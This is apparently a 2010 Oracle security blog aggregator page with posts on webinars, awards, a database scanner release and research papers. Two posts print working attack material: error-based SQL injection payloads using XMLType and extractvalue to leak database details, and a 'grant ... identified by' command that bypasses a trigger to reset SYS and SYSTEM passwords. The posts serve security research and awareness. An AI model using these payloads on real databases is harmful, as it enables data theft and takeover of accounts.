OraNA :: Security

A paper on Sentrigo Hedgehog and Pete Finnigan webinar slides

(author unknown) — Fri, 12 Mar 2010 06:00:37 PST

I did two webinars this week with Sentrigo titled "The right way to Secure Oracle", these went well. The slides for the talks have been added to my Oracle Security white papers page . I have also written a short....[Read More]

Posted by Pete On 12/03/10 At 01:59 PM

Blocking Tools from using the database

(author unknown) — Wed, 10 Mar 2010 03:59:15 PST

I saw Charles Hoopers post titled " Why Doesnâ€™t This Trigger Work â€" No Developer Tools Allowed in the Database " via my Oracle blogs aggregator and read it with interest as its related to issues i come across with....[Read More]

Posted by Pete On 10/03/10 At 11:08 AM

Pete Finnigan Webinar on Oracle Security

(author unknown) — Mon, 08 Mar 2010 08:47:59 PST

It has been quite a while since my last blog post; i keep promising to post more often and even worse I have a long list of things to blog about but I don't seem to get enough time recently....[Read More]

Posted by Pete On 08/03/10 At 04:04 PM

sec_return_server_release_banner Secure by Default?

Paul Wright — Sun, 07 Mar 2010 16:11:43 PST

Hello World, Congratulations to Sentrigo for being nominated again in the SC Awards in the US for Hedgehog. http://www.scmagazineus.com/scawards2010-finalists/section/1309/ Just came across an ex-colleague from Pentest Ltd named Simon Fletcher who has started a blog on Oracle Security. http://blog.fifteentwentyone.co.uk/2010/02/sql92security.html Nice post and good luck with the new blog. Oracle config issues like these are interesting for already very highly secured [...]

Oracle TNS Resend Packet

Slavik — Sun, 07 Mar 2010 14:41:56 PST

As you can see here, the Python code handles a specific case of Oracle TNS layer requesting a RESEND of the last packet. I’ve noticed that no matter what client I’m trying to connect with, Oracle is always requesting a RESEND after the initial CONNECT request as you can see here (removed various ACK packets, [...]

SC Magazine awards dinner

Slavik — Fri, 05 Mar 2010 17:41:36 PST

We had a great time at the SC magazine awards dinner on Tuesday. We were finalists in the “best SME security solution” category but unfortunately we did not win. Here is Andy, our VP marketing before the dinner and announcements: And here he is after some wine and us not winning:

RSA Conference 2010 – Linux WIFI users

Slavik — Tue, 02 Mar 2010 11:42:00 PST

So, I arrived to Moscone Center a bit late for the first cloud security alliance session. It turns out that there was a huge line to enter and a lot of people were left outside. Having a free 1.5 hours, I wanted to connect and check emails. I’ve already received my password so I thought it [...]

E-Business Suite Security and DBMS_LDAP.INIT

Paul Wright — Sun, 28 Feb 2010 17:23:22 PST

Hi Folks, Vulnerability in E-Business Suite R12 requires non-default diagnostics mode so Low risk. http://www.securityfocus.com/archive/1/509460 Having said that it is worth keeping an eye on Internet facing Oracle applications, though there is not a huge amount on this from O’Reilly and Apress. Google books has a relevant book free of charge named “Security, Audit and Control Features Oracle E-Business [...]

It's been a while...

(author unknown) — Fri, 26 Feb 2010 23:34:16 PST

It's been a while since I wrote my last blog entry. Actually, it's been a really long while. In the interim, I've since sold NGSSoftware and after staying on for 16 months have now resigned and am taking a wee break, but planning my next venture - V3rity. All will be revealed. Soon.

Posted by David On 26/02/10 At 03:34 PM

Enumerate Oracle SIDs

Slavik — Fri, 26 Feb 2010 12:37:00 PST

As promised, here is a small Python script to allow you to enumerate and find Oracle SIDs. Of course, the usual caveats apply – if it breaks something, I’m not responsible Use at your own risk. I’m using the sidlist.txt file from David’s OAK but there are plenty of available resources with common SID [...]

2 new ways to create error messages

Alexander Kornbrust — Thu, 25 Feb 2010 14:36:29 PST

Today I came across a nice blog article “Methods of quick exploitation of blind SQL Injection Vulnerabilities in Oracle” from Dmitry Evteev about new techniques which can be used in error-based SQL injection. One of the comments contains an additional technique. Even if the title of the blog is not correct for Oracle (it’s not blind SQL Injection it’s error based which is a small but important difference) the idea itself is nice. Sometimes the SQL statements are more complicated than necessary.

Using error messages of XMLType:

The XMLType allows to create error messages containing custom strings (like database users, passwords, …). The string must start with a ‘<:’ that’s why we have to concatenate ‘<:’ to the string. Additionally the all spaces and at-signs must be replaced.

SQL> select XMLType((’<:’||user||’>’)) from dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName “:SYS” (not a Name)
Error at line 1
ORA-06512: at “SYS.XMLTYPE”, line 0
ORA-06512: at line 1

SQL> select XMLType((’<:’||replace((select banner from v$version where rownum=1) ,’ ‘,”)||’>’)) from dual;
ERROR:
19
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName
“:Oracle9iEnterpriseEditionRelease9.2.0.8.0-Production” (not a Name)
Error at line 1
ORA-06512: at “SYS.XMLTYPE”, line 0
ORA-06512: at line 1

This can be used in an SQL Injection statement:

or 1=length(XMLType((’<:’||replace((select banner from v$version where rownum=1) ,’ ‘,”)||’>’)))–

The second technique is mentioned in the comments:

SQL> select extractvalue(xmltype(’<x/>’),’/$’||(SELECT banner FROM v$version where rownum=1)) from dual;

*
ERROR at line 1:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00601: Invalid token in: ‘/$Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product‘

This can be used in an SQL Injection statement:

or 1=length(extractvalue(xmltype(’<x/>’),’/$’||(SELECT banner FROM v$version where rownum=1)))–

Securing Java in Oracle Update and escalating to SYSDBA

Paul Wright — Wed, 24 Feb 2010 19:24:05 PST

Updated Securing Java in Oracle paper here. David’s work has drawn attention. http://www.h-online.com/security/news/item/Vulnerability-in-Oracle-11gR2-allows-system-privileges-for-all-Update-923143.html http://www.computerworld.com/s/article/9151318/Black_Hat_Zero_day_hack_of_Oracle_11g_database_revealed?taxonomyId=1 etc.. What the reports miss is that this definitely affects 10.2.0.4.3 as well in a big way. Oracle have provided some guidance in the absence of a patch: - revoke execute on "oracle/aurora/util/Wrapper" from public; - grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE; - grant execute on sys.dbms_jvm_exp_perms [...]

How to Prevent a User Granted the ALTER USER Privilege From Changing SYS/SYSTEM password and how to bypass it

Alexander Kornbrust — Wed, 24 Feb 2010 14:19:19 PST

I found the following nice article “How to Prevent a User Granted the ALTER USER Privilege From Changing SYS/SYSTEM password” [271077.1] on My Oracle Support. As always if I see PL/SQL code I am looking for ways to find security problems or to bypass limitations.

SQL> conn / as sysdba
Connected.

SQL> CREATE or REPLACE TRIGGER prohibit_alter_SYSTEM_SYS_pass
AFTER ALTER on SCOTT.schema
BEGIN
IF ora_sysevent=’ALTER’ and ora_dict_obj_type = ‘USER’ and
(ora_dict_obj_name = ‘SYSTEM’ or ora_dict_obj_name = ‘SYS’)
THEN
RAISE_APPLICATION_ERROR(-20003,
‘You are not allowed to alter SYSTEM/SYS user.’);
END IF;
END;
/

Trigger created.

SQL> conn scott/tiger
Connected.

SQL>alter user system identified by alex;
alter user system identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5

SQL> alter user sys identified by alex;
alter user sys identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5

SQL> alter user dbsnmp identified by dbsnmp;
User altered.

Many Oracle users are not aware that the grant command can also be used to change passwords or even create users (”grant dba to user1,user2 identified by user1,user2″). In our case we can use this technique to bypass the database trigger.
SQL> grant connect to sys identified by alex;
Grant succeeded.

SQL> grant connect to system identified by alex;
Grant succeeded.

To fix this problem we have to block grant commands as well….

New Repscan 3.0 is available

Alexander Kornbrust — Tue, 23 Feb 2010 10:17:44 PST

The latest version 3.0 of our database scanner Repscan is now available. This new version supports MS SQL Server and Oracle databases. Repscan comes with a large amount of new features and a complete new GUI (First database scanner with Office-2007 UI).

Here some of the new features of Repscan 3.0:

Support for MS SQL Server (2000, 2005, 2008)
Extremely user-friendly database configuration wizard (screenshot)
Flexible tree control (re-group databases by status, hierarchy, …) (screenshot)
Database security browser with drill down functionality (PDF, XLS, … export) (screenshot, screenshot)
New reports (performance, used_features, …)
Data Discovery (SSN, PII, Creditcard, Passwords, …)
Database Enumeration (custom, NMap support) (screenshot)
Pentest Features (Guess SID, Check default username/password combinations, …)
Exploit & Code Library (screenshot)
Version and Patch Information
Skins

Here some (old) features of Repscan:

Password plugin architecture
Password plugins for Oracle DES, SHA1, OID, APEX, OVS
Commandline features
PL/SQL Source Code Analysis Report

Here some statements of Repscan 3.0 users:

“Repscan Rocks”, “I must have this tool.”, “Very cool stuff”, “really like the clean interface… checks are great”, “…tend to be more Oracle security information hub than just scanner :-)”

Over the next few weeks I will show here more details of some Repscan 3.0 features.

If you want to test Repscan 3.0 you can download it from our exclusive distributor Sentrigo

SANS 2010 CWE/SANS Top 25 Most Dangerous Programming Errors

(author unknown) — Tue, 23 Feb 2010 06:11:48 PST

SANS, Mitre and a lot of security experts have just completed the top 25 most dangerous programming errors list. This is a really useful resource and anyone developing code not just against Oracle but in general should be concerned to....[Read More]

Posted by Pete On 23/02/10 At 01:42 PM

Exploiting Oracle from the web whitepaper

Slavik — Mon, 22 Feb 2010 18:47:00 PST

Sumit Siddarth (Sid) has published an excellent whitepaper talking about hacking Oracle from the web. It shows many types and techniques of SQL injection and how to use an SQL injection vulnerability as a jumping point to extract data, take control of the database and even escape the database to the OS. Security folks and DBAs [...]

Really good whitepaper about “Hacking Oracle from the Web”

Alexander Kornbrust — Mon, 22 Feb 2010 08:09:45 PST

Sumit Siddarth (Sid) has just published a really good whitepaper about “Hacking Oracle from the Web“.This is the most comprehensive published collection of different techniques for attacking Oracle from the web. Sid spent a lot of time composing the different techniques mentioned in various presentations and whitepapers.

Sid describes various techniques like data extraction (inband techniques like union or error messages, out-of-band techniques like heavy queries, blind, …), privilege escalation (sys.kupp$proc, dbms_repcat_rpc and dbms_export_extension) and OS code execution.

Well done Sid.

SQL92_SECURITY

Simon Fletcher — Sat, 20 Feb 2010 07:59:57 PST

The Oracle database initialization parameter SQL92_SECURITY is an often overlooked security parameter. Either because people don't understand it or because they think it's irrelevant.So what does it do? Well, to quote the documentation:"The SQL92 standards specify that security administrators should be able to require that users have SELECT privilege on a table when executing an UPDATE or DELETE

RMOUG presentation

Slavik — Fri, 19 Feb 2010 10:30:32 PST

I had a great time at RMOUG this year. Did one of my usual presentation about attack vectors on the database and how to defend against them. I think the presentation was well received and the attendees loved the demos – I mostly just demonstrate instead of going through slides. One of my favorite demos is [...]

Meet Us at RSA Conference 2010

Deborah Volk — Wed, 17 Feb 2010 15:44:00 PST

On Tuesday March 2nd we'll be hosting a happy hour at a suitably trendy location within walking distance of Moscone. Come have a drink with us!

To make this a truly exciting evening, we'll be holding a contest for FREE consulting time where the winning organization will be treated to a 2-hour health check of their current or planned identity and access management implementation. To be eligible for the contest you will not have to come up with an alternative proof of the Fermat theorem or jump through rings of fire or spell your name backwards faster than a 5th grader. In fact, all you have to do to qualify is register, show up and put your name in the hat.